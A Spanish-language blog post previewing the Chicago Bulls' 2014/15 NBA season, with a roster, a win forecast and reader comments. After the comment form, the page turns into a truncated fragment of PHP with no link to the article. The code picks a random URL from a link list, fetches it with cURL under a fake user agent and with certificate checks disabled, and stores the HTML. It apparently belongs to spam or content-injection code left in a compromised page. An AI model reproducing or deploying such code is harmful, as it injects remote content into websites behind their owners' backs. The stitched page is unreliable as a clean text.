Chicago Bulls 2014/2015: The Return 3.0

20 de October de 2014 por HisRoyalAirness

Tras dos temporadas convulsas, en las que el buen hacer de una plantilla limitada y un excelente cuerpo técnico han hecho que la franquicia ofreciese una gran imagen, parece que la salud de Derrick Rose se ha estabilizado y las cosas pintan distintas en la Ciudad del Viento. Con la incorporación de Pau Gasol y la reincorporación de su jugador franquicia, el equipo mejora al del pasado año de manera más que notable. El español y el Jugador Defensivo del pasado año, Joakim Noah, formarán una de la mejores y más potentes parejas interiores de todo el campeonato, a la que hay que sumarle al cumplidor Taj Gibson. Una gran plantilla sobre el papel que estará a las órdenes de un cuerpo técnico que ha conseguido sacar lo inimaginable de un roster limitadísimo los últimos dos años.

Con todos ustedes, los renovados Bulls.

derrick rose

MOVIMIENTOS CLAVE

Es indudable que la incorporación de Pau Gasol es un movimiento capital. Parece que ya se ha recuperado de sus lesiones en el pie y es un arma ofensiva de primer nivel, algo de lo que los toros no han estado muy sobrados últimamente. Esto, unido a su visión de juego y la de Noah, convierten la pintura de los Bulls en un arma de distribución temible. Además conviene no olvidar que llega a sustituir a Carlos Boozer, así que el vacío a llenar podrá cubrirlo de sobra con su nivel actual.

Se han hecho también con Aaron Brooks pero su gran temporada en Houston ya queda lejos y sus minutos dependerán de la salud de Rose.

Vía draft llegan Doug McDermott y Cameron Bairstow, dos grandes anotadores en la NCAA pero que está por ver cómo se adaptarán a más altas cotas. Situados ambos entre el puesto de 3 y medio-4, se disputarán las habichuelas con el otro recién llegado, Nikola Mirotic, y el propio Gibson.

gasol rose noah

QUÉ ESPERAMOS DE ELLOS

Absolutamente todo lo que pase este año con los Chicago Bulls dependerá de la salud de Derrick Rose. Se le ha visto desafinado en el ámbito anotador en el Mundial de España pero todos conocemos su talento. La temporada es muy larga y hay tiempo de sobra para coger el ritmo, aunque la misma acumulación de partidos es la que produce más preocupación por la salud de sus castigadas rodillas.

Pongamos que Rose no tiene problemas físicos y vuelve a un 80% de su capacidad: esperaríamos a un equipo temible y con multitud de armas, un poderoso juego interior, anotadores exteriores y de media distancia y un backcourt atlético y dominante; la seña de Thibodeau es el juego coral e inteligente, junto con una defensa férrea y agresiva, así que parece que tiene las piezas adecuadas.

Pero, lo dicho: todo depende de la salud de su estrella.

PRONÓSTICO

Con Rose sano: 58 victorias, primer clasificado en la Conferencia Este.

PLANTILLA

PG: Derrick Rose, Kirk Hinrich, Aaron Brooks.
SG: Jimmy Butler, E´Twaun Moore.
SF: Mike Dunleavy, Doug McDermott, Tony Snell.
PF: Pau Gasol, Taj Gibson, Nikola Mirotic, Cameron Bairstow
C: Joakim Noah, Nazr Mohammed.

Bajas: D.J. Augustin, Carlos Boozer, Jimmer Fredette, Greg Smith.

Comenta

13 comentarios a esta entrada

  1. Nacho dice:
    #1

    Será por amor a Pau, será por Thibodeau, por lo bien que me cae Noah… o por lo que sea, pero yo ya he apostado por Rose MVP.
    Veo un equipazo, y coincido con HisRoyal, Rose sano y son primeros del Este. Y un equipazo en PO, que me recuerda mucho a los últimos y brillantes Celtic’s. De Mirotic podemos esperarlo todo también.
    No sé, buenas vibraciones y muy muy buena pinta.

      Citar

  2. TheDeerHunter dice:
    #2

    A mí 58 victorias me parecen muchas casi en cualquier escenario. Tampoco les veo como primeros clasificados de la conferencia Este. Se te ha pasado mojarte sobre dónde llegarán en playoffs. Más allá de una segunda ronda sería un objetivo optimista, aunque efectivamente en un mundo ideal estos serían un hueso duro de roer.

    Tengo ganas de ver un Pau con hambre. Tampoco soy particularmente optimista en ese sentido. Ya dije que el que tiene hambre de sobra es Taj Gibson, y que Pau tendrá que echarle cojones para quitarle el puesto al otro y no al revés. Obviamente con mejorando actitud es un jugador de otro nivel, pero… hay que ganárselo.

      Citar

  3. Vader dice:
    #3

    No creo que a Pau le faltara nunca actitud, lo que pasa que jugar los últimos años con Mike Brown y luego Mike d’Antoni creo que desesperan a cualquiera. No hay comparacion posible con Gibson, hay demasiado diferencia a favor de Pau.

    Saludos

      Citar

  4. Denise dice:
    #4

    Nacho:
    Será por amor a Pau, será por Thibodeau, por lo bien que me cae Noah… o por lo que sea, pero yo ya he apostado por Rose MVP.

    Nacho, tambien has apostado por Yannick Noah como jugador defensivo…hombre con la raqueta en mano se puede poner buenos tapones y al que se ponga tonto raquetazo en la cabeza…asi Jugador Defensivo seguro….jejejejeje

    A los Bulls con Rose sano y a buen rendimiento les doy 2º y pueden pelear por el anillo perfectamente. En muchos sitios dicen que si falta SF y demas, no lo creo me gusta Tony Snell mucho, Dunleavy no tanto aunque siempre aporta y confio en McDermott. Y de pintura van sobrados.
    El problema es que lo que he visto de Rose en el Mundial me ha dejado con la sensación de que dificilmente pueda volver a ser un jugador franquicia determinante.

      Citar

  5. HisRoyalAirness dice:
    #5

    Me mojo Deer, con Rose sano (y no me refiero a nivel MVP sino a un 80%), Finales del Este contra los Cavs.
    Les doy estas cotas por un simple motivo: el cuerpo técnico.

      Citar

  6. HisRoyalAirness dice:
    #6

    En las finales de conferencia, con ambos equipos sanos, estaría fifty-fifty, pero creo que el equipo de Thibs puede decantar la balanza

      Citar

  7. Nacho dice:
    #7

    Denise: Nacho, tambien has apostado por Yannick Noah como jugador defensivo…hombre con la raqueta en mano se puede poner buenos tapones y al que se ponga tonto raquetazo en la cabeza…asi Jugador Defensivo seguro….jejejejeje

    A los Bulls con Rose sano y a buen rendimiento les doy 2º y pueden pelear por el anillo perfectamente. En muchos sitios dicen que si falta SF y demas, no lo creo me gusta Tony Snell mucho, Dunleavy no tanto aunque siempre aporta y confio en McDermott. Y de pintura van sobrados.
    El problema es que lo que he visto de Rose en el Mundial me ha dejado con la sensación de que dificilmente pueda volver a ser un jugador franquicia determinante.

    Jejejeje, son cosas de la edad… el papi es casi de mi quinta, jajajaja.

      Citar

  8. Azabel dice:
    #8

    una pena pero no coincido, ya he visto volver a Rose el año pasado y por mas sano que estuviera no era el mismo, su grandioso juego era demasiado atletico y sin esa potencia y atletismo solo era un buen jugador, lejos del MVP que fue

    luego volvio a lesionarse y lo ultimo que vimos de el fue dar pena en el mundial hace unos meses,

    viendo como jugo en el mundial y damos como cantidato a los Bulls por si el esta sano, que podemos decir de los Cavs viendo como jugo irving el mundial y teniendo al lebron al lado?

      Citar

  9. rumbero dice:
    #9

    Pues el amigo Rose se ha marcado un partidazo esta madrugada precisamente contra los Cavs. Lo mejor es que se le ha visto muy bien físicamente, agresivo con jugadas marca de la casa. Ojalá aguanten esas rodillas

      Citar

  10. Azabel dice:
    #10

    rumbero:
    Pues el amigo Rose se ha marcado un partidazo esta madrugada precisamente contra los Cavs. Lo mejor es que se le ha visto muy bien físicamente, agresivo con jugadas marca de la casa. Ojalá aguanten esas rodillas

    faltaba que yo dijiera que no volveria a ser el rose de antes y se casca 30 puntos, pero ojo, contra Irving, que puede robar muchso balones si, pero defendiendo el uno contra uno es un lastre

      Citar

  11. txusma dice:
    #11

    Lo impresionante es que Rose ha vuelto a meter triples. El problema era que la línea FIBA estaba demasiado cerca…

      Citar

  12. Azabel dice:
    #12

    txusma:
    Lo impresionante es que Rose ha vuelto a meter triples. El problema era que la línea FIBA estaba demasiado cerca…

    si rose va a depender su juego de encestar triples, no le veo buen futuro

      Citar

  13. GreenPride dice:
    #13

    La alternativa al rey en el Este
    Asi de claro mas que nada porque no hay otra
    Todo dependera de Pau y Rose Con ellos sanos y a buen buen nivel aspiran al anillo Si no se quedaran en un equipo que dara guerra y poco mas. En cualquier caso si ni son al menos segundos en el Este sera un fracaso

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>